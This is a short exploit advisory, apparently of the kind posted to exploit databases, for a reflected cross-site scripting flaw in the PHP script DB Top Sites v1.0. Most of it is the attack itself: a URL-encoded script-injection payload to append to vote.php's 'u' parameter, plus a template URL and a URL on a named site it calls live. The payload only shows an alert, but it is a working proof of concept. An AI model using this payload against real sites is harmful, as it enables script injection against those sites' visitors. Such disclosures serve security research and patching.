########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [»] I am from the hell... ============================================================================== [»] DB Top Sites v1.0 Remote XSS vulnerability ============================================================================== [»] Script: [ DB Top Sites v1.0 ] [»] Language: [ PHP ] [»] Download: [ http://www.jnmsolutions.co.uk/index.php?act=scripts&page=topsites&id=download ] [»] Founder: [ Moudi ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] [»] Team: [ EvilWay ] [»] SiteWeb: [ Want your site here ? ADD ME MSN. ] [»] Price: [ FREE ] ########################################################################### ===[ XSS ]=== [»] http://www.site.com/patch/vote.php?u=RGVtb24= ===[ LIVE ]=== [»] http://www.jnmsolutions.co.uk/topsites/vote.php?u=RGVtb24= [»] XSS TO ADD: 1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(314888759311)%3B%3C/ScRiPt%3E Note: You need to know that the " RGVtb24 " change for each vote ! Author: Moudi ###########################################################################